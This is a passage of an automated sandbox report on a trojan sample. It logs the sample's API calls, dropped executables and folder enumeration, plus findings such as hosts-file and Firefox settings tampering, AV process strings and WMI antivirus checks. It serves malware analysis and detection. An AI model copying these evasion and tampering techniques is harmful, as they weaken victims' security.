Source: C:\Windows\System32\svchost.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 9_2_00007FF7A34CD04C
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP, 9_2_00007FF7A34CB77C
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,WideCharToMultiByte, 9_2_00007FF7A34CCEF0
Source: C:\Windows\System32\svchost.exe Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo, 9_2_00007FF7A34CA57C
Source: C:\Windows\System32\svchost.exe Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA, 9_2_00007FF7A34BDD34
Source: C:\Windows\System32\svchost.exe Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num, 9_2_00007FF7A34C9DF4
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: GetProcAddress,GetLocaleInfoW, 12_2_00007FF8B8303AE0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: EnumSystemLocalesW, 12_2_00007FF8B836AF64
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: EnterCriticalSection,EnumSystemLocalesW,LeaveCriticalSection, 12_2_00007FF8B8368FB8
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: GetPrimaryLen,EnumSystemLocalesW, 12_2_00007FF8B836AFC4
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: GetPrimaryLen,EnumSystemLocalesW, 12_2_00007FF8B836B074
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 12_2_00007FF8B836B4B8
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 12_2_00007FF8B836B62C
Source: C:\Windows\System32\svchost.exe Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon, 13_2_00007FF67F569868
Source: C:\Windows\System32\svchost.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 13_2_00007FF67F56D04C
Source: C:\Windows\System32\svchost.exe Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,wcschr,wcschr,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson, 13_2_00007FF67F56B934
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP, 13_2_00007FF67F56B77C
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoEx, 13_2_00007FF67F56B830
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,WideCharToMultiByte, 13_2_00007FF67F56CEF0
Source: C:\Windows\System32\svchost.exe Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo, 13_2_00007FF67F56A57C
Source: C:\Windows\System32\svchost.exe Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num, 13_2_00007FF67F569DF4
Source: C:\Windows\System32\svchost.exe Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA, 13_2_00007FF67F55DD34
Source: C:\Windows\System32\svchost.exe Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson, 13_2_00007FF67F56B310
Source: C:\Windows\System32\svchost.exe Code function: EnumSystemLocalesEx, 13_2_00007FF67F5692F0
Source: C:\Windows\System32\svchost.exe Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,GetLocaleInfoEx,_invoke_watson, 13_2_00007FF67F5662BC
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Queries volume information: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\ucrtbase.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\_ctypes.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-console-l1-1-0.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-datetime-l1-1-0.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-file-l1-1-0.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-file-l1-2-0.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-file-l2-1-0.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-memory-l1-1-0.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\Desktop\DTBZGIOOSO VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\Documents VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\Documents\FACWLRWHGG VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\Documents\JDSOXXXWOA VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\Pictures VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\Pictures\Saved Pictures VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\Music VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF9576AC GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,GetTickCount64,QueryPerformanceCounter, 0_2_00007FF6CF9576AC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF944FD8 GetUserNameW, 0_2_00007FF6CF944FD8
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EB518C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation, 10_2_00007FF779EB518C
Source: C:\Windows\explorer.exe Code function: 3_2_11057508 GetUserNameW,GetComputerNameW,GetNativeSystemInfo,GetVersionExA,wsprintfA,free, 3_2_11057508
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Modifies the hosts file
Source: C:\Windows\System32\svchost.exe File written: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Overwrites Mozilla Firefox settings
Source: C:\Windows\System32\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js Jump to behavior
Source: C:\Windows\System32\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js Jump to behavior
Source: C:\Windows\System32\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js Jump to behavior
Source: C:\Windows\System32\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js Jump to behavior
AV process strings found (often used to terminate AV products)
Source: svchost.exe Binary or memory string: procexp.exe
Source: 5BB2.tmp.x.exe, 00000006.00000002.2533766437.0000000005D52000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
